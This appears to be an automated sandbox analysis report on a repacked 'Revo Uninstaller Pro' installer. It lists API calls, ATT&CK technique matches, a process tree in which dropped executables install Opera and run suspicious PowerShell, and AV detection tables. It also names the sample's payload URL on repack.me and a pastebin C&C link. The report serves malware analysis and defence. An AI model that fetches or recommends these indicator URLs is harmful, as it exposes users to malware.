Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\runonce.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FCBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,16_2_002FCBB8
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
MITRE ATT&CK Matrix (listed by tactic column; a count in parentheses is the number of signatures matched for that technique, techniques without a count were not matched in this analysis)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (12); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: DLL Side-Loading (1); Component Object Model Hijacking (1); Windows Service (21); Registry Run Keys / Startup Folder (21); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: DLL Side-Loading (1); Component Object Model Hijacking (1); Access Token Manipulation (1); Windows Service (21); Process Injection (12); Registry Run Keys / Startup Folder (21); Startup Items; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Masquerading (43); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (12); Regsvr32 (1); Rundll32 (1)

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: System Time Discovery (11); File and Directory Discovery (4); System Information Discovery (56); Security Software Discovery (231); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Remote System Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (4); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1571786; Sample: Revo.Uninstaller.Pro.v5.3.4.exe; Startdate: 09/12/2024; Architecture: WINDOWS; Score: 44). Numbers in parentheses after a process are the graph's created-registry-value and created-file counters.

Start
  DNS/IP: pastebin.com; us-features.opera-api2.com; 18 other IPs or domains
  Signatures: Multi AV Scanner detection for dropped file; Possible COM Object hijacking; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet; Connects to a pastebin service (likely for C&C) (pastebin.com)
  Started: Revo.Uninstaller.Pro.v5.3.4.exe (61 138); ruplp.exe

Revo.Uninstaller.Pro.v5.3.4.exe
  DNS/IP: pastebin.com 104.20.4.235, 443, 49709 CLOUDFLARENETUS United States; mail.repack.me 194.87.189.43, 443, 49710 AS-REGRU Russian Federation
  Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32; 15 other files (8 malicious)
  Signatures: Creates an undocumented autostart registry key; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Sample is not signed and drops a device driver
  Started: cmd.exe; rundll32.exe (4 2); RevoUninPro.exe (16 5); 3 other processes

cmd.exe
  Started: PACK.EXE; conhost.exe

rundll32.exe
  Dropped: C:\Windows\system32\...\revoflt.sys (copy), PE32+; C:\Windows\System32\drivers\SETE8C2.tmp, PE32+
  Signatures: Creates an autostart registry key pointing to binary in C:\Windows
  Started: runonce.exe (2)

PACK.EXE
  Dropped: C:\Users\user\AppData\Local\Temp\...\ya.exe, PE32
  Signatures: Multi AV Scanner detection for dropped file; Suspicious powershell command line found
  Started: ya.exe; powershell.exe; powershell.exe; powershell.exe

runonce.exe
  Started: grpconv.exe

ya.exe
  DNS/IP: trn.lb.opera.technology 107.167.96.30, 443, 49713 IOFLOODUS United States
  Dropped: C:\Users\user\Downloads\OperaSetup.exe, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32; C:\Users\user\AppData\Local\...\INetC.dll, PE32; C:\Users\user\AppData\...\OperaSetup[1].exe, PE32
  Signatures: Multi AV Scanner detection for dropped file
  Started: OperaSetup.exe

powershell.exe (first instance)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe (second and third instances)
  Started: conhost.exe (one each)

OperaSetup.exe
  Dropped: C:\Users\user\AppData\Local\...\setup.exe, PE32
  Started: setup.exe

setup.exe
  DNS/IP: lati.lb.opera.technology 107.167.110.216, 443, 49718 OPERASOFTWAREUS United States; submit-trn.osp.opera.software 107.167.125.189, 443, 49716, 49717 OPERASOFTWAREUS United States; 3 other IPs or domains
  Dropped: Opera_installer_2412091640027403532.dll, PE32; C:\Users\user\AppData\Local\...\setup.exe, PE32; C:\Users\user\AppData\Local\...\opera_package, PE32; Opera_115.0.5322.7...toupdate_x64[1].exe, PE32
  Started: setup.exe; setup.exe; setup.exe

setup.exe (first child)
  Dropped: Opera_installer_2412091640048718040.dll, PE32
  Started: setup.exe, which dropped Opera_installer_2412091640052497196.dll, PE32

setup.exe (second child)
  Dropped: Opera_installer_2412091640030686032.dll, PE32

setup.exe (third child)
  Dropped: Opera_installer_2412091640042418092.dll, PE32

Source | Detection | Scanner | Label | Link
Revo.Uninstaller.Pro.v5.3.4.exe | 17% | ReversingLabs | Win32.Malware.Nemesis |

Source | Detection | Scanner | Label | Link
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys | 2% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy) | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys | 0% | ReversingLabs | |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkg | 30% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\PACK.EXE | 30% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | 25% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dll | 0% | ReversingLabs | |
C:\Windows\System32\drivers\SETE8C2.tmp | 0% | ReversingLabs | |
C:\Windows\system32\DRIVERS\revoflt.sys (copy) | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.3 | 0% | Avira URL Cloud | safe |
http://repacks.ddns.nethttps://repack.me/ad.htmlopen | 0% | Avira URL Cloud | safe |
http:////file:////www.web.OS | 0% | Avira URL Cloud | safe |
https://repack.me/ad.html | 0% | Avira URL Cloud | safe |
http://www.mirage-systems.de/%operationName% | 0% | Avira URL Cloud | safe |
http://www.mirage-systems.de/ | 0% | Avira URL Cloud | safe |
http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractor | 0% | Avira URL Cloud | safe |
http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractor | 0% | Avira URL Cloud | safe |
http://www.borland.com/namespaces/Types | 0% | Avira URL Cloud | safe |
https://mail.repack.me/tsjtmfdm.pkg | 0% | Avira URL Cloud | safe |
http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.1 | 0% | Avira URL Cloud | safe |
https://www.revouninstallerpro.com/db/ilogs/Uninstaller | 0% | Avira URL Cloud | safe |
http://repacks.ddns.netopen | 0% | Avira URL Cloud | safe |
http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1 | 0% | Avira URL Cloud | safe |
https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com | 0% | Avira URL Cloud | safe |
https://mail.repack.me/Kj | 0% | Avira URL Cloud | safe |
https://mail.repack.me/ | 0% | Avira URL Cloud | safe |
http://www.animation.arthouse.org | 0% | Avira URL Cloud | safe |
http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1 | 0% | Avira URL Cloud | safe |
http://www.Licence-Protector.com | 0% | Avira URL Cloud | safe |
http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1 | 0% | Avira URL Cloud | safe |
https://mail.repack.me/tsjtmfdm.pkg2iq | 0% | Avira URL Cloud | safe |
https://www.revouninstallerpro.com/db/ilogs/.ruelDelete | 0% | Avira URL Cloud | safe |
https://mail.repack.me/tsjtmfdm.pkgto | 0% | Avira URL Cloud | safe |
http://www.vsrevogroup.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.repack.me | 194.87.189.43 | true | false | | unknown
na-download.opera.com | 107.167.96.36 | true | false | | high
na-autoupdate.opera.com | 107.167.96.39 | true | false | | high
submit-trn.osp.opera.software | 107.167.125.189 | true | false | | high
lati.lb.opera.technology | 107.167.110.216 | true | false | | high
trn.lb.opera.technology | 107.167.96.30 | true | false | | high
pastebin.com | 104.20.4.235 | true | false | | high
autoupdate.geo.opera.com | unknown | unknown | false | | high
download3.operacdn.com | unknown | unknown | false | | high
desktop-netinstaller-sub.osp.opera.software | unknown | unknown | false | | high
features.opera-api2.com | unknown | unknown | false | | high
autoupdate.opera.com | unknown | unknown | false | | high
net.geo.opera.com | unknown | unknown | false | | high
download.opera.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://mail.repack.me/tsjtmfdm.pkg | false | Avira URL Cloud: safe | unknown
https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77 | false | | high
https://download.opera.com/download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74 | false | | high
https://desktop-netinstaller-sub.osp.opera.software/v1/binary | false | | high
https://autoupdate.opera.com/me/ | false | | high
https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64 | false | | high
https://net.geo.opera.com/opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 | false | | high
https://pastebin.com/raw/vkwZzU9B | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.mirage-systems.de/%operationName% | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/vkwZzU9Bget8191 | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractor | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.revouninstaller.com/) | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.schneier.com/paper-blowfish-fse.htmlS | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/vkwZzU9Bm | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://tools.ietf.org/html/rfc4648S | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mirage-systems.de/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://repacks.ddns.nethttps://repack.me/ad.htmlopen | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/soap12/SV | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.color.org | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                      http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/wsdl/soap/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http:////file:////www.web.OSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://repack.me/ad.htmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.movable-type.co.uk/scripts/xxtea.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.borland.com/namespaces/TypesRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.3Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://pastebin.com/raw/vkwZzU9BDRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.revouninstaller.com/contact-us/C:Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-87setup.exe, 0000001D.00000003.2150919335.000000000180D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.revouninstaller.com/feedback/?product=proRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.revouninstaller.com/support/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.revouninstallerpro.com/db/ilogs/UninstallerRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/SoftwareRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/soap/encoding/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.aiim.org/pdfa/ns/id/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://mail.repack.me/KjRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://tools.ietf.org/html/rfc1321Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://repacks.ddns.netopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.borland.com/rootpart.xmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/upRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://nsis.sf.net/NSIS_ErrorErrorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1630444927.000000000AA62000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1403909400.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                              high
                                                                                                              https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.symauth.com/cps0(Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://mail.repack.me/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.itl.nist.gov/fipspubs/fip180-1.htmRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.animation.arthouse.orgRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.schneier.com/paper-twofish-paper.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.Licence-Protector.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.symauth.com/rpa00Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/wsdl/http/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/wsdl/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://mail.repack.me/tsjtmfdm.pkg2iqRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
